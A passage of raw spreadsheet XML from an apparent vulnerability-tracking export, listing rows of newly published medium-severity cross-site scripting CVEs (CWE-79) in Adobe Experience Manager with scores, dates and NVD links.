s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75670</t></is></c></row><row r="1392"><c r="A1392" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1392" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1392" s="5" t="inlineStr"><is><t>CVE-2026-75671</t></is></c><c r="D1392" s="5" t="n"><v>5.4</v></c><c r="E1392" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1392" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1392" s="5" t="inlineStr" /><c r="H1392" s="5" t="n"><v>0.003</v></c><c r="I1392" s="5" t="inlineStr" /><c r="J1392" s="5" t="inlineStr" /><c r="K1392" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1392" s="5" t="inlineStr" /><c r="M1392" s="5" t="inlineStr" /><c r="N1392" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1392" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1392" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1392" s="5" t="inlineStr" /><c r="R1392" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S139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2" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75671</t></is></c></row><row r="1393"><c r="A1393" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1393" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1393" s="5" t="inlineStr"><is><t>CVE-2026-75672</t></is></c><c r="D1393" s="5" t="n"><v>5.4</v></c><c r="E1393" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1393" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1393" s="5" t="inlineStr" /><c r="H1393" s="5" t="n"><v>0.003</v></c><c r="I1393" s="5" t="inlineStr" /><c r="J1393" s="5" t="inlineStr" /><c r="K1393" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1393" s="5" t="inlineStr" /><c r="M1393" s="5" t="inlineStr" /><c r="N1393" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1393" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1393" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1393" s="5" t="inlineStr" /><c r="R1393" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S139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3" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75672</t></is></c></row><row r="1394"><c r="A1394" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1394" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1394" s="5" t="inlineStr"><is><t>CVE-2026-75674</t></is></c><c r="D1394" s="5" t="n"><v>5.4</v></c><c r="E1394" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1394" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1394" s="5" t="inlineStr" /><c r="H1394" s="5" t="n"><v>0.003</v></c><c r="I1394" s="5" t="inlineStr" /><c r="J1394" s="5" t="inlineStr" /><c r="K1394" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1394" s="5" t="inlineStr" /><c r="M1394" s="5" t="inlineStr" /><c r="N1394" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1394" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1394" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1394" s="5" t="inlineStr" /><c r="R1394" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S139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4" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75674</t></is></c></row><row r="1395"><c r="A1395" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1395" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1395" s="5" t="inlineStr"><is><t>CVE-2026-75675</t></is></c><c r="D1395" s="5" t="n"><v>5.4</v></c><c r="E1395" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1395" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1395" s="5" t="inlineStr" /><c r="H1395" s="5" t="n"><v>0.003</v></c><c r="I1395" s="5" t="inlineStr" /><c r="J1395" s="5" t="inlineStr" /><c r="K1395" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1395" s="5" t="inlineStr" /><c r="M1395" s="5" t="inlineStr" /><c r="N1395" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1395" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1395" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1395" s="5" t="inlineStr" /><c r="R1395" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S139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5" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75675</t></is></c></row><row r="1396"><c r="A1396" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1396" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1396" s="5" t="inlineStr"><is><t>CVE-2026-75677</t></is></c><c r="D1396" s="5" t="n"><v>5.4</v></c><c r="E1396" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1396" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1396" s="5" t="inlineStr" /><c r="H1396" s="5" t="n"><v>0.003</v></c><c r="I1396" s="5" t="inlineStr" /><c r="J1396" s="5" t="inlineStr" /><c r="K1396" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1396" s="5" t="inlineStr" /><c r="M1396" s="5" t="inlineStr" /><c r="N1396" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1396" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1396" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1396" s="5" t="inlineStr" /><c r="R1396" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S139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6" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75677</t></is></c></row><row r="1397"><c r="A1397" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1397" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1397" s="5" t="inlineStr"><is><t>CVE-2026-75678</t></is></c><c r="D1397" s="5" t="n"><v>5.4</v></c><c r="E1397" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1397" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1397" s="5" t="inlineStr" /><c r="H1397" s="5" t="n"><v>0.003</v></c><c r="I1397" s="5" t="inlineStr" /><c r="J1397" s="5" t="inlineStr" /><c r="K1397" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1397" s="5" t="inlineStr" /><c r="M1397" s="5" t="inlineStr" /><c r="N1397" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1397" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1397" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1397" s="5" t="inlineStr" /><c r="R1397" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S139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7" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75678</t></is></c></row><row r="1398"><c r="A1398" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1398" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1398" s="5" t="inlineStr"><is><t>CVE-2026-75679</t></is></c><c r="D1398" s="5" t="n"><v>5.4</v></c><c r="E1398" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1398" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1398" s="5" t="inlineStr" /><c r="H1398" s="5" t="n"><v>0.003</v></c><c r="I1398" s="5" t="inlineStr" /><c r="J1398" s="5" t="inlineStr" /><c r="K1398" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1398" s="5" t="inlineStr" /><c r="M1398" s="5" t="inlineStr" /><c r="N1398" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1398" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1398" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1398" s="5" t="inlineStr" /><c r="R1398" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S139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8" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75679</t></is></c></row><row r="1399"><c r="A1399" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1399" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1399" s="5" t="inlineStr"><is><t>CVE-2026-75680</t></is></c><c r="D1399" s="5" t="n"><v>5.4</v></c><c r="E1399" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1399" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1399" s="5" t="inlineStr" /><c r="H1399" s="5" t="n"><v>0.003</v></c><c r="I1399" s="5" t="inlineStr" /><c r="J1399" s="5" t="inlineStr" /><c r="K1399" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1399" s="5" t="inlineStr" /><c r="M1399" s="5" t="inlineStr" /><c r="N1399" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1399" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1399" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1399" s="5" t="inlineStr" /><c r="R1399" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S139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399" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75680</t></is></c></row><row r="1400"><c r="A1400" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1400" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1400" s="5" t="inlineStr"><is><t>CVE-2026-75681</t></is></c><c r="D1400" s="5" t="n"><v>5.4</v></c><c r="E1400" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1400" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1400" s="5" t="inlineStr" /><c r="H1400" s="5" t="n"><v>0.003</v></c><c r="I1400" s="5" t="inlineStr" /><c r="J1400" s="5" t="inlineStr" /><c r="K1400" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1400" s="5" t="inlineStr" /><c r="M1400" s="5" t="inlineStr" /><c r="N1400" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1400" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1400" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1400" s="5" t="inlineStr" /><c r="R1400" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S140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0" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75681</t></is></c></row><row r="1401"><c r="A1401" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1401" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1401" s="5" t="inlineStr"><is><t>CVE-2026-75683</t></is></c><c r="D1401" s="5" t="n"><v>5.4</v></c><c r="E1401" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1401" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1401" s="5" t="inlineStr" /><c r="H1401" s="5" t="n"><v>0.003</v></c><c r="I1401" s="5" t="inlineStr" /><c r="J1401" s="5" t="inlineStr" /><c r="K1401" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1401" s="5" t="inlineStr" /><c r="M1401" s="5" t="inlineStr" /><c r="N1401" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1401" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1401" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1401" s="5" t="inlineStr" /><c r="R1401" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S140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1" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75683</t></is></c></row><row r="1402"><c r="A1402" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1402" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1402" s="5" t="inlineStr"><is><t>CVE-2026-75685</t></is></c><c r="D1402" s="5" t="n"><v>5.4</v></c><c r="E1402" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1402" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1402" s="5" t="inlineStr" /><c r="H1402" s="5" t="n"><v>0.003</v></c><c r="I1402" s="5" t="inlineStr" /><c r="J1402" s="5" t="inlineStr" /><c r="K1402" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1402" s="5" t="inlineStr" /><c r="M1402" s="5" t="inlineStr" /><c r="N1402" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1402" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1402" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1402" s="5" t="inlineStr" /><c r="R1402" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S140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2" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75685</t></is></c></row><row r="1403"><c r="A1403" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1403" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1403" s="5" t="inlineStr"><is><t>CVE-2026-75687</t></is></c><c r="D1403" s="5" t="n"><v>5.4</v></c><c r="E1403" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1403" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1403" s="5" t="inlineStr" /><c r="H1403" s="5" t="n"><v>0.003</v></c><c r="I1403" s="5" t="inlineStr" /><c r="J1403" s="5" t="inlineStr" /><c r="K1403" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1403" s="5" t="inlineStr" /><c r="M1403" s="5" t="inlineStr" /><c r="N1403" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1403" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1403" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1403" s="5" t="inlineStr" /><c r="R1403" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S140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3" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75687</t></is></c></row><row r="1404"><c r="A1404" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1404" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1404" s="5" t="inlineStr"><is><t>CVE-2026-75690</t></is></c><c r="D1404" s="5" t="n"><v>5.4</v></c><c r="E1404" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1404" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1404" s="5" t="inlineStr" /><c r="H1404" s="5" t="n"><v>0.003</v></c><c r="I1404" s="5" t="inlineStr" /><c r="J1404" s="5" t="inlineStr" /><c r="K1404" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1404" s="5" t="inlineStr" /><c r="M1404" s="5" t="inlineStr" /><c r="N1404" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1404" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1404" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1404" s="5" t="inlineStr" /><c r="R1404" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S140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4" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75690</t></is></c></row><row r="1405"><c r="A1405" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1405" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1405" s="5" t="inlineStr"><is><t>CVE-2026-75691</t></is></c><c r="D1405" s="5" t="n"><v>5.4</v></c><c r="E1405" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1405" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1405" s="5" t="inlineStr" /><c r="H1405" s="5" t="n"><v>0.003</v></c><c r="I1405" s="5" t="inlineStr" /><c r="J1405" s="5" t="inlineStr" /><c r="K1405" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1405" s="5" t="inlineStr" /><c r="M1405" s="5" t="inlineStr" /><c r="N1405" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1405" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1405" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1405" s="5" t="inlineStr" /><c r="R1405" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S140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5" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75691</t></is></c></row><row r="1406"><c r="A1406" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1406" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1406" s="5" t="inlineStr"><is><t>CVE-2026-75692</t></is></c><c r="D1406" s="5" t="n"><v>5.4</v></c><c r="E1406" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1406" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1406" s="5" t="inlineStr" /><c r="H1406" s="5" t="n"><v>0.003</v></c><c r="I1406" s="5" t="inlineStr" /><c r="J1406" s="5" t="inlineStr" /><c r="K1406" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1406" s="5" t="inlineStr" /><c r="M1406" s="5" t="inlineStr" /><c r="N1406" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1406" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1406" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1406" s="5" t="inlineStr" /><c r="R1406" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S140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6" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75692</t></is></c></row><row r="1407"><c r="A1407" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1407" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1407" s="5" t="inlineStr"><is><t>CVE-2026-75693</t></is></c><c r="D1407" s="5" t="n"><v>5.4</v></c><c r="E1407" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1407" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1407" s="5" t="inlineStr" /><c r="H1407" s="5" t="n"><v>0.003</v></c><c r="I1407" s="5" t="inlineStr" /><c r="J1407" s="5" t="inlineStr" /><c r="K1407" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1407" s="5" t="inlineStr" /><c r="M1407" s="5" t="inlineStr" /><c r="N1407" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1407" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1407" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1407" s="5" t="inlineStr" /><c r="R1407" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S140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7" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75693</t></is></c></row><row r="1408"><c r="A1408" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1408" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1408" s="5" t="inlineStr"><is><t>CVE-2026-75694</t></is></c><c r="D1408" s="5" t="n"><v>5.4</v></c><c r="E1408" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1408" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1408" s="5" t="inlineStr" /><c r="H1408" s="5" t="n"><v>0.003</v></c><c r="I1408" s="5" t="inlineStr" /><c r="J1408" s="5" t="inlineStr" /><c r="K1408" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1408" s="5" t="inlineStr" /><c r="M1408" s="5" t="inlineStr" /><c r="N1408" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1408" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1408" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1408" s="5" t="inlineStr" /><c r="R1408" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S140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8" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75694</t></is></c></row><row r="1409"><c r="A1409" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1409" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1409" s="5" t="inlineStr"><is><t>CVE-2026-75695</t></is></c><c r="D1409" s="5" t="n"><v>5.4</v></c><c r="E1409" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1409" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1409" s="5" t="inlineStr" /><c r="H1409" s="5" t="n"><v>0.003</v></c><c r="I1409" s="5" t="inlineStr" /><c r="J1409" s="5" t="inlineStr" /><c r="K1409" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1409" s="5" t="inlineStr" /><c r="M1409" s="5" t="inlineStr" /><c r="N1409" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1409" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1409" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1409" s="5" t="inlineStr" /><c r="R1409" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S140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09" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75695</t></is></c></row><row r="1410"><c r="A1410" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1410" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1410" s="5" t="inlineStr"><is><t>CVE-2026-75696</t></is></c><c r="D1410" s="5" t="n"><v>5.4</v></c><c r="E1410" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1410" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1410" s="5" t="inlineStr" /><c r="H1410" s="5" t="n"><v>0.003</v></c><c r="I1410" s="5" t="inlineStr" /><c r="J1410" s="5" t="inlineStr" /><c r="K1410" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1410" s="5" t="inlineStr" /><c r="M1410" s="5" t="inlineStr" /><c r="N1410" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1410" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1410" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1410" s="5" t="inlineStr" /><c r="R1410" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S141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0" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75696</t></is></c></row><row r="1411"><c r="A1411" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1411" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1411" s="5" t="inlineStr"><is><t>CVE-2026-75700</t></is></c><c r="D1411" s="5" t="n"><v>5.4</v></c><c r="E1411" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1411" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1411" s="5" t="inlineStr" /><c r="H1411" s="5" t="n"><v>0.003</v></c><c r="I1411" s="5" t="inlineStr" /><c r="J1411" s="5" t="inlineStr" /><c r="K1411" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1411" s="5" t="inlineStr" /><c r="M1411" s="5" t="inlineStr" /><c r="N1411" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1411" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1411" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1411" s="5" t="inlineStr" /><c r="R1411" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S141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1" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75700</t></is></c></row><row r="1412"><c r="A1412" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1412" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1412" s="5" t="inlineStr"><is><t>CVE-2026-75701</t></is></c><c r="D1412" s="5" t="n"><v>5.4</v></c><c r="E1412" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1412" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1412" s="5" t="inlineStr" /><c r="H1412" s="5" t="n"><v>0.003</v></c><c r="I1412" s="5" t="inlineStr" /><c r="J1412" s="5" t="inlineStr" /><c r="K1412" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1412" s="5" t="inlineStr" /><c r="M1412" s="5" t="inlineStr" /><c r="N1412" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1412" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1412" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1412" s="5" t="inlineStr" /><c r="R1412" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S141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2" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75701</t></is></c></row><row r="1413"><c r="A1413" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1413" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1413" s="5" t="inlineStr"><is><t>CVE-2026-75702</t></is></c><c r="D1413" s="5" t="n"><v>5.4</v></c><c r="E1413" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1413" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1413" s="5" t="inlineStr" /><c r="H1413" s="5" t="n"><v>0.003</v></c><c r="I1413" s="5" t="inlineStr" /><c r="J1413" s="5" t="inlineStr" /><c r="K1413" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1413" s="5" t="inlineStr" /><c r="M1413" s="5" t="inlineStr" /><c r="N1413" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1413" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1413" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1413" s="5" t="inlineStr" /><c r="R1413" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S141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3" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75702</t></is></c></row><row r="1414"><c r="A1414" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1414" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1414" s="5" t="inlineStr"><is><t>CVE-2026-75704</t></is></c><c r="D1414" s="5" t="n"><v>5.4</v></c><c r="E1414" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1414" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1414" s="5" t="inlineStr" /><c r="H1414" s="5" t="n"><v>0.003</v></c><c r="I1414" s="5" t="inlineStr" /><c r="J1414" s="5" t="inlineStr" /><c r="K1414" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1414" s="5" t="inlineStr" /><c r="M1414" s="5" t="inlineStr" /><c r="N1414" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1414" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1414" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1414" s="5" t="inlineStr" /><c r="R1414" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S141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4" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75704</t></is></c></row><row r="1415"><c r="A1415" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1415" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1415" s="5" t="inlineStr"><is><t>CVE-2026-75705</t></is></c><c r="D1415" s="5" t="n"><v>5.4</v></c><c r="E1415" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1415" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1415" s="5" t="inlineStr" /><c r="H1415" s="5" t="n"><v>0.003</v></c><c r="I1415" s="5" t="inlineStr" /><c r="J1415" s="5" t="inlineStr" /><c r="K1415" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1415" s="5" t="inlineStr" /><c r="M1415" s="5" t="inlineStr" /><c r="N1415" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1415" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1415" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1415" s="5" t="inlineStr" /><c r="R1415" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S141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5" s="6" 